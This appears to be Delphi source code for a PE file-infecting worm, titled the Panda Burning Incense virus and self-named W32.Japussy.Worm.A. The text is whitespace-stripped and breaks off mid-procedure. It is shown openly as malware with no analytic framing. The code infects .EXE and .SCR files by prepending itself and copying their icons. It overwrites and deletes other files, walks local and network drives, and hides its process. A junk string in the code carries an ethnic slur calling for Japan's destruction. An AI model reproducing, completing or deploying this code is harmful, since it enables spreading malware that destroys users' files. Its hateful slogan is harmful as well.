熊猫烧香病毒

programJapussy;usesWindows,SysUtils,Classes,Graphics,ShellAPI{,Registry};constHeaderSize=82432;//病毒体的大小IconOffset=$12EB8;//PE文件主图标的偏移量//在我的Delphi5SP1上面编译得到的大小，其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量{HeaderSize=38912;//Upx压缩过病毒体的大小IconOffset=$92BC;//Upx压缩过PE文件主图标的偏移量//Upx1.24W用法:upx-9--8086Japussy.exe}IconSize=$2E8;//PE文件主图标的大小--744字节IconTail=IconOffset+IconSize;//PE文件主图标的尾部ID=$44444444;//感染标记//垃圾码，以备写入Catchword='Ifaraceneedtobekilledout,itmustbeYamato.'+'Ifacountryneedtobedestroyed,itmustbeJapan!'+'***W32.Japussy.Worm.A***';{$R*.RES}functionRegisterServiceProcess(dwProcessID,dwType:Integer):Integer;stdcall;external'Kernel32.dll';//函数声明varTmpFile:string;Si:STARTUPINFO;Pi:PROCESS_INFORMATION;IsJap:Boolean=False;//日文操作系统标记{判断是否为Win9x}functionIsWin9x:Boolean;varVer:TOSVersionInfo;beginResult:=False;Ver.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);ifnotGetVersionEx(Ver)thenExit;if(Ver.dwPlatformID=VER_PLATFORM_WIN32_WINDOWS)then//Win9xResult:=True;end;{在流之间复制}procedureCopyStream(Src:TStream;sStartPos:Integer;Dst:TStream;dStartPos:Integer;Count:Integer);varsCurPos,dCurPos:Integer;beginsCurPos:=Src.Position;dCurPos:=Dst.Position;Src.Seek(sStartPos,0);Dst.Seek(dStartPos,0);Dst.CopyFrom(Src,Count);Src.Seek(sCurPos,0);Dst.Seek(dCurPos,0);end;{将宿主文件从已感染的PE文件中分离出来，以备使用}procedureExtractFile(FileName:string);varsStream,dStream:TFileStream;begintrysStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);trydStream:=TFileStream.Create(FileName,fmCreate);trysStream.Seek(HeaderSize,0);//跳过头部的病毒部分dStream.CopyFrom(sStream,sStream.Size-HeaderSize);finallydStream.Free;end;finallysStream.Free;end;exceptend;end;{填充STARTUPINFO结构}procedureFillStartupInfo(varSi:STARTUPINFO;State:Word);beginSi.cb:=SizeOf(Si);Si.lpReserved:=nil;Si.lpDesktop:=nil;Si.lpTitle:=nil;Si.dwFlags:=STARTF_USESHOWWINDOW;Si.wShowWindow:=State;Si.cbReserved2:=0;Si.lpReserved2:=nil;end;{发带毒邮件}procedureSendMail;begin//哪位仁兄愿意完成之？汤姆感激不尽！end;{感染PE文件}procedureInfectOneFile(FileName:string);varHdrStream,SrcStream:TFileStream;IcoStream,DstStream:TMemoryStream;iID:LongInt;aIcon:TIcon;Infected,IsPE:Boolean;i:Integer;Buf:array[0..1]ofChar;begintry//出错则文件正在被使用，退出ifCompareText(FileName,'JAPUSSY.EXE')=0then//是自己则不感染Exit;Infected:=False;IsPE:=False;SrcStream:=TFileStream.Create(FileName,fmOpenRead);tryfori:=0to$108do//检查PE文件头beginSrcStream.Seek(i,soFromBeginning);SrcStream.Read(Buf,2);if(Buf[0]=#80)and(Buf[1]=#69)then//PE标记beginIsPE:=True;//是PE文件Break;end;end;SrcStream.Seek(-4,soFromEnd);//检查感染标记SrcStream.Read(iID,4);if(iID=ID)or(SrcStream.Size10240)then//太小的文件不感染Infected:=True;finallySrcStream.Free;end;ifInfectedor(notIsPE)then//如果感染过了或不是PE文件则退出Exit;IcoStream:=TMemoryStream.Create;DstStream:=TMemoryStream.Create;tryaIcon:=TIcon.Create;try//得到被感染文件的主图标(744字节)，存入流aIcon.ReleaseHandle;aIcon.Handle:=ExtractIcon(HInstance,PChar(FileName),0);aIcon.SaveToStream(IcoStream);finallyaIcon.Free;end;SrcStream:=TFileStream.Create(FileName,fmOpenRead);//头文件HdrStream:=TFileStream.Create(ParamStr(0),fmOpenReadorfmShareDenyNone);try//写入病毒体主图标之前的数据CopyStream(HdrStream,0,DstStream,0,IconOffset);//写入目前程序的主图标CopyStream(IcoStream,22,DstStream,IconOffset,IconSize);//写入病毒体主图标到病毒体尾部之间的数据CopyStream(HdrStream,IconTail,DstStream,IconTail,HeaderSize-IconTail);//写入宿主程序CopyStream(SrcStream,0,DstStream,HeaderSize,SrcStream.Size);//写入已感染的标记DstStream.Seek(0,2);iID:=$44444444;DstStream.Write(iID,4);finallyHdrStream.Free;end;finallySrcStream.Free;IcoStream.Free;DstStream.SaveToFile(FileName);//替换宿主文件DstStream.Free;end;except;end;end;{将目标文件写入垃圾码后删除}procedureSmashFile(FileName:string);varFileHandle:Integer;i,Size,Mass,Max,Len:Integer;begintrySetFileAttributes(PChar(FileName),0);//去掉只读属性FileHandle:=FileOpen(FileName,fmOpenWrite);//打开文件trySize:=GetFileSize(FileHandle,nil);//文件大小i:=0;Randomize;Max:=Random(15);//写入垃圾码的随机次数ifMax5thenMax:=5;Mass:=SizedivMax;//每个间隔块的大小Len:=Length(Catchword);whileiMaxdobeginFileSeek(FileHandle,i*Mass,0);//定位//写入垃圾码，将文件彻底破坏掉FileWrite(FileHandle,Catchword,Len);Inc(i);end;finallyFileClose(FileHandle);//关闭文件end;DeleteFile(PChar(FileName));//删除之exceptend;end;{获得可写的驱动器列表}functionGetDrives:string;varDiskType:Word;D:Char;Str:string;i:Integer;beginfori:=0to25do//遍历26个字母beginD:=Chr(i+65);Str:=D+':\';DiskType:=GetDriveType(PChar(Str));//得到本地磁盘和网络盘if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)thenResult:=Result+D;end;end;{遍历目录，感染和摧毁文件}procedureLoopFiles(Path,Mask:string);vari,Count:Integer;Fn,Ext:string;SubDir:TStrings;SearchRec:TSearchRec;Msg:TMsg;functionIsValidDir(SearchRec:TSearchRec):Integer;beginif(SearchRec.Attr16)and(SearchRec.Name'.')and(SearchRec.Name'..')thenResult:=0//不是目录elseif(SearchRec.Attr=16)and(SearchRec.Name'.')and(SearchRec.Name'..')thenResult:=1//不是根目录elseResult:=2;//是根目录end;beginif(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)thenbeginrepeatPeekMessage(Msg,0,0,0,PM_REMOVE);//调整消息队列，避免引起怀疑ifIsValidDir(SearchRec)=0thenbeginFn:=Path+SearchRec.Name;Ext:=UpperCase(ExtractFileExt(Fn));if(Ext='.EXE')or(Ext='.SCR')thenbeginInfectOneFile(Fn);//感染可执行文件endels